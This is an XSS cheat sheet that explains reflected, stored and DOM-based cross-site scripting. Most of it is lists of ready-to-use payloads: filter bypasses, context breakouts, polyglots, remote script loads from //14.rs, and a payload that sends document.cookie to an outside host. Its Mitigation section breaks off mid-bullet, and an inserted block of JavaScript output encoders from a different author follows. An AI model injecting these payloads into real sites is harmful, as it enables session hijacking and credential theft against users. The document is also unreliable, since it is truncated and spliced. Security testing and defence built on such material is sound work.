# XSS

XSS (Cross-Site Scripting) is a client-side code injection attack in which an attacker gets malicious script executed in a victim's web browser, in the context of a site the victim trusts.

### Impact

* **Account Hijacking**: Attackers could steal session cookies and take over the victim's session. If the victim is an administrator, this can yield administrative access.
* **Credential Theft**: Theft of credentials such as passwords entered into a cloned login page injected by the script.
* **Data Leakage**: Personally identifiable information (PII) such as credit card numbers, SSNs, or any data stored in the browser could be accessed.
* **Other**: Redirection to malicious web pages, keylogging, downloading malware.
* Access to geolocation, webcam, microphone, and files on the system.

There are 3 types of XSS:

* Reflected (Non-persistent)
* Stored (Persistent)
* DOM-based

## Reflected (Non-Persistent)

The payload is part of the request sent to the server and is reflected back, unencoded, in the response.

For example, a website's dashboard greets the user by their username. If the username is not sanitized properly before it is rendered, JS code embedded in it executes.

## Stored (Persistent)

The payload passed to the web application is stored on the server and executes whenever the stored data is rendered, for any user who views it.

For example, payloads could be saved as comments on a page and then when the comments are loaded, it could execute JS code.

## DOM-based

Client-side JavaScript writes attacker-controlled data into the DOM without encoding it, so malicious code executes. This is a more advanced attack, as the payload may never reach the server or its WAF and executes entirely on the client side.

For example, a page that runs `document.write(document.URL)` writes the unencoded URL into the document, so a payload carried in the URL (such as a script tag pointing at an attacker-controlled site) is executed.

## Entry Points

Any user-controlled parameter such as:

* Input fields
* Headers such as Host and Referer
* URL redirection
* URI parameters
* File Upload (File name)

## Payloads

### Popular

```
<script>alert(1)</script>
<!--><script src=//14.rs>
url=%26%2302java%26%23115cript:alert(document.domain)
<video><source onerror=location=/\02.rs/+document.cookie>
<script>alert(document.domain)</script>
<iframe src="javascript:alert(1)">
<embed src=//14.rs>
<details ontoggle=alert(1) open>test</details>
<xss onclick="alert(1)" style=display:block>test</xss>
<xss draggable="true" ondragstart="alert(1)" style=display:block>test</xss>
<script>onerror=alert;throw 1</script>
```

Polyglots:

```
%0ajavascript:`/*\"/*-->&lt;svg onload='/*</template></noembed></noscript></style></title></textarea></script><html onmouseover="/**/ alert()//'">`
```

### Context Breaking

#### HTML Context

Case: \<tag> Searched for $input \</tag>

```
<svg onload=alert()>
</tag><svg onload=alert()>
```

#### Attribute Context

Case: \<tag attribute="$input">

```
"><svg onload=alert()>
"><svg onload=alert()><b attr="
" onmouseover=alert() "
"onmouseover=alert()//
"autofocus/onfocus="alert()
```

#### JavaScript Context

Case: \<script> var something = '$input'; \</script>

```
'-alert()-'
'-alert()//'
'}alert(1);{'
'}%0Aalert(1);%0A{'
</script><svg onload=alert()>
```

### Bypassing

#### Without Event Handlers

```
<object data=javascript:confirm()>
<a href=javascript:confirm()>click here
<script src=//14.rs></script>
<script>confirm()</script>
```

#### Without Space

```
<svg/onload=confirm()>
<iframe/src=javascript:alert(1)>
```

#### Without Slash (/)

```
<svg onload=confirm()>
<img src=x onerror=confirm()>
```

#### Without closing angle bracket (>)

```
<svg onload=confirm()//
<svg onload=alert(1)<!--
```

#### Without alert, confirm, prompt

```
<script src=//14.rs></script>
<svg onload=co\u006efirm()>
<svg onload=z=co\u006efir\u006d,z()>
```

#### Without a Valid HTML tag

```
<x onclick=confirm()>click here
<x ondrag=confirm()>drag it
```

## Mitigation

* L
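
Every payload in the Context Breaking section above works only because `$input` is echoed with no encoding, or with the wrong encoding for the place it lands. The following is an added example, not code from the original playbook: one encoder per context from that section, checked against that section's own payloads. The `<p>`/`<input>` templates and the `isNeutralised` checker are assumptions of mine, not from the page.

```javascript
// Added example (not the cheat sheet's own code): context-aware output encoders for
// the three "Context Breaking" cases, checked against that section's payloads.
// Plain Node.js; the template tags (p, input) and the checker are my own.

// HTML body context: <tag> Searched for $input </tag>
function encodeForHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;",
  })[c]);
}

// Quoted attribute context: <tag attribute="$input">. The same entities suffice
// only because the template always wraps the value in double quotes.
const encodeForAttribute = encodeForHtml;

// JS string context: <script> var something = '$input'; </script>. Everything
// outside [A-Za-z0-9] becomes \xHH or \u{..}, so quotes, braces, newlines and
// "</script>" cannot terminate the literal or the script block.
function encodeForJsString(s) {
  return Array.from(String(s), (ch) => {
    if (/[A-Za-z0-9]/.test(ch)) return ch;
    const cp = ch.codePointAt(0);
    return cp <= 0xff ? "\\x" + cp.toString(16).padStart(2, "0")
                      : "\\u{" + cp.toString(16) + "}";
  }).join("");
}

// Renders the cheat sheet's three cases with one untrusted value.
function render(input) {
  return [
    `<p> Searched for ${encodeForHtml(input)} </p>`,
    `<input value="${encodeForAttribute(input)}">`,
    `<script> var something = '${encodeForJsString(input)}'; </script>`,
  ].join("\n");
}

// True when only the template's own tags appear and the JS literal is still one
// quoted string made of alphanumerics and escapes.
function isNeutralised(html) {
  const tags = html.match(/<\/?[a-z]+/gi) || [];
  const allowed = new Set(["<p", "</p", "<input", "<script", "</script"]);
  const literalIntact = /var something = '[A-Za-z0-9\\{}]*';/.test(html);
  return tags.every((t) => allowed.has(t.toLowerCase())) && literalIntact;
}

// Payloads copied from the Context Breaking section above.
const PAYLOADS = ["</tag><svg onload=alert()>", '"><svg onload=alert()><b attr="',
  '"autofocus/onfocus="alert()', "'-alert()-'", "'}alert(1);{'", "</script><svg onload=alert()>"];
const allNeutralised = () => PAYLOADS.every((p) => isNeutralised(render(p)));
```

Note that the encoders are only correct for the template shown next to each one; an attribute that the template leaves unquoted, or a value dropped straight into a JS expression rather than a quoted string, needs a different treatment.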

